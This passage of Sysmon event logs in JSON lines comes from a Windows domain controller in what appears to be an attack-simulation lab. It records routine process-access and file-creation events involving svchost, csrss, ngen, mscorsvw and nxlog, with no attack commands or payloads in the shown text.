C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:32.201","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-134C-5F25-0000-001003F10D00}","TargetProcessId":"1292","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:32","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8104,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:32.638\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:32.638","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:33","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8105,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:33.591\r\nProcessGuid: {E2A3D6B1-134C-5F25-0000-001003F10D00}\r\nProcessId: 1292\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\50c-0\\System.Activities.Core.Presentation.dll\r\nCreationUtcTime: 2020-08-01 07:01:33.591","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:33.591","ProcessGuid":"{E2A3D6B1-134C-5F25-0000-001003F10D00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\50c-0\\System.Activities.Core.Presentation.dll","CreationUtcTime":"2020-08-01 07:01:33.591","EventReceivedTime":"2020-08-01 07:01:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:33","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8106,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:33.638\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:33.638","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:33","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8107,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:33.669\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-134D-5F25-0000-00105BFA0D00}\r\nTargetProcessId: 1232\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:33.669","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-134D-5F25-0000-00105BFA0D00}","TargetProcessId":"1232","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:33","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8108,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:33.669\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-134D-5F25-0000-00105BFA0D00}\r\nTargetProcessId: 1232\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:33.669","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-134D-5F25-0000-00105BFA0D00}","TargetProcessId":"1232","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:33","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8109,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:33.669\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-134D-5F25-0000-00105BFA0D00}\r\nTargetProcessId: 1232\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:33.669","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-134D-5F25-0000-00105BFA0D00}","TargetProcessId":"1232","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:33","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8110,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:33.747\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-134D-5F25-0000-0010B1FE0D00}\r\nTargetProcessId: 3212\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:33.747","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-134D-5F25-0000-0010B1FE0D00}","TargetProcessId":"3212","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:33","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8111,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:33.747\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: 